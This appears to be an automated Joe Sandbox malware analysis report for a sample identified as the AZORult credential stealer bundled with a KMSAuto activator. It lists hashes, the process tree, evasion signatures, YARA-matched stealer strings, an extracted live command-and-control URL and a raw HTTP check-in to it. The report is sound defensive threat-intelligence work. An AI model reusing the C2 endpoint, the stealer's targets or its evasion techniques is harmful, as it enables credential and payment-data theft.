Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe

Overview

General Information

Sample Name:ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
Analysis ID:834745
MD5:1ac70328ce1dea448647022c5b360a67
SHA1:4f295ccfc7b7a2eeeec53df66d22743dbac301a6
SHA256:addcdf9e3bac722442fb269492fea86e91d4e97ee5df4ca5c03515d534fb0c51
Tags:AZORultexe
Infos:

Detection

Azorult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Azorult Info Stealer
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Hides threads from debuggers
Detected VMProtect packer
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to evade analysis by execution special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
IP address seen in connection with other malware
Entry point lies outside standard sections
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe (PID: 4204 cmdline: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe MD5: 1AC70328CE1DEA448647022C5B360A67)
    • csrss.exe (PID: 5224 cmdline: "C:\Users\user\AppData\Roaming\csrss.exe" /nc /s MD5: 2A0C555C70EB25094C94E4BA5A6BA131)
      • WerFault.exe (PID: 2584 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1136 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • KMSAuto Net.exe (PID: 5148 cmdline: "C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe" /nc MD5: 2FB86BE791B4BB4389E55DF0FEC04EB7)
      • cmd.exe (PID: 6620 cmdline: cmd /c md "C:\Users\user\AppData\Local\MSfree Inc" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5916 cmdline: cmd /c echo test>>"C:\Program Files (x86)\KMSAuto\KMSAuto Net\test.test" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5528 cmdline: C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AzorultAZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Malware Configuration

Threatname: Azorult

{"C2 url": "http://f0355889.xsph.ru/Panel/index.php"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_csrss.exe_f22660799b81b1cdf575f7ba80bebda2d012813c_4666b2e0_0a75e935\Report.werSUSP_WER_Suspicious_Crash_DirectoryDetects a crashed application executed in a suspicious directoryFlorian Roth (Nextron Systems)
  • 0x116:$a1: ReportIdentifier=
  • 0x198:$a1: ReportIdentifier=
  • 0x61c:$a2: .Name=Fault Module Name
  • 0x2efe:$a3: AppPath=
  • 0x2efe:$l4: AppPath=C:\Users\
  • 0x2efe:$s8: AppPath=C:\Users\user\AppData\Roaming\csrss.exe

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
    00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmpWindows_Trojan_Azorult_38fce9eaunknownunknown
      • 0x18fd0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
      • 0xd164:$a2: %APPDATA%\.purple\accounts.xml
      • 0xd8ac:$a3: %TEMP%\curbuf.dat
      • 0x189b0:$a4: PasswordsList.txt
      • 0x13d28:$a5: Software\Valve\Steam
      Process Memory Space: csrss.exe PID: 5224JoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
        Process Memory Space: csrss.exe PID: 5224JoeSecurity_Azorult_1Yara detected AzorultJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.csrss.exe.400000.0.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
            1.2.csrss.exe.400000.0.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
              1.2.csrss.exe.400000.0.unpackWindows_Trojan_Azorult_38fce9eaunknownunknown
              • 0x193d0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
              • 0xd564:$a2: %APPDATA%\.purple\accounts.xml
              • 0xdcac:$a3: %TEMP%\curbuf.dat
              • 0x18db0:$a4: PasswordsList.txt
              • 0x14128:$a5: Software\Valve\Steam
              1.2.csrss.exe.400000.0.unpackAzorult_1Azorult Payloadkevoreilly
              • 0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
              • 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:192.168.2.3141.8.192.15149695802029465 03/25/23-14:27:06.642541
              SID:2029465
              Source Port:49695
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeReversingLabs: Detection: 56%
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeVirustotal: Detection: 44%Perma Link
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\csrss.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
              Multi AV Scanner detection for dropped file
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeReversingLabs: Detection: 71%
              Source: C:\Users\user\AppData\Roaming\csrss.exeReversingLabs: Detection: 66%
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\csrss.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeJoe Sandbox ML: detected
              Source: 1.2.csrss.exe.400000.0.unpackMalware Configuration Extractor: Azorult {"C2 url": "http://f0355889.xsph.ru/Panel/index.php"}
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49695 -> 141.8.192.151:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://f0355889.xsph.ru/Panel/index.php
              Source: Joe Sandbox ViewIP Address: 141.8.192.151 141.8.192.151
              Source: Joe Sandbox ViewIP Address: 141.8.192.151 141.8.192.151
              Source: global trafficHTTP traffic detected: POST /Panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: f0355889.xsph.ruContent-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 48 ed 3e 3e ed 3e 32 ed 3e 3d ed 3e 3d ed 3e 33 89 28 38 8c 28 39 fa 28 39 f8 28 39 f1 28 39 f1 4f 2f fb 3d 4e ed 3e 3a ed 3e 3c Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KH>>>2>=>=>3(8(9(9(9(9O/=N>:><
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sat, 25 Mar 2023 13:27:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 65 30 39 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 6
              Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: " /S /Q3spp\store\cache\cache.dat5spp\store\cache\cache.dat";spp\store\2.0\cache\cache.dat=spp\store\2.0\cache\cache.dat"Uhttp://www.youtube.com/watch?v=niXf0ov0S8I equals www.youtube.com (Youtube)
              Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: http://www.youtube.com/results?search_query=%22KMSAuto%20Net%202015%22+KMS Log Analyzer.xlsm equals www.youtube.com (Youtube)
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002217000.00000004.00001000.00020000.00000000.sdmp, ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: csrss.exe, 00000001.00000003.274427424.0000000002E00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://f0355889.xsph.ru/Panel/index.php
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.265139659.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.265177397.0000000005D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
              Source: KMSAuto Net.exe.0.drString found in binary or memory: http://forum.ru-board.com
              Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: http://forum.ru-board.comMarathiWindows
              Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: http://goo.gl/eD7s9XShowWindowDominican
              Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: http://goo.gl/eD7s9Xg
              Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: http://habrahabr.ru/post/192986/#
              Source: csrss.exe, csrss.exe, 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: http://ip-api.com/json
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002217000.00000004.00001000.00020000.00000000.sdmp, ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
              Source: KMSAuto Net.exe, 00000002.00000002.516542366.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002217000.00000004.00001000.00020000.00000000.sdmp, ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002217000.00000004.00001000.00020000.00000000.sdmp, ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002217000.00000004.00001000.00020000.00000000.sdmp, ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: KMSAuto Net.exe, 00000002.00000002.519780552.0000000005D00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
              Source: KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264689563.0000000005D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comW
              Source: KMSAuto Net.exe, 00000002.00000003.264689563.0000000005D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comn
              Source: KMSAuto Net.exe, 00000002.00000003.267280152.0000000005D04000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.267584430.0000000005D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.c
              Source: KMSAuto Net.exe, 00000002.00000003.267584430.0000000005D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.c#
              Source: KMSAuto Net.exe, 00000002.00000003.267182751.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: KMSAuto Net.exe, 00000002.00000003.267584430.0000000005D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: KMSAuto Net.exe, 00000002.00000003.267704547.0000000005D0B000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.267280152.0000000005D04000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.267584430.0000000005D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnl
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/9
              Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/M
              Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0a
              Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Z
              Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/b
              Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ito
              Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/~
              Source: KMSAuto Net.exe, 00000002.00000003.264600737.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264661332.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264634623.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264512674.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264465536.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264393524.0000000005D22000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264689563.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264764177.0000000005D24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: KMSAuto Net.exe, 00000002.00000003.264600737.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264661332.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264634623.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264512674.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264465536.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264393524.0000000005D22000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264689563.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264764177.0000000005D24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comd
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: KMSAuto Net.exe, 00000002.00000003.266039290.0000000005D09000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: KMSAuto Net.exe, 00000002.00000003.266039290.0000000005D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krA
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.265177397.0000000005D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: KMSAuto Net.exe, 00000002.00000003.265139659.0000000005D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comn
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: http://www.youtube.com/results?search_query=%22KMSAuto%20Net%202015%22
              Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drString found in binary or memory: http://www.youtube.com/watch?v=niXf0ov0S8I
              Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
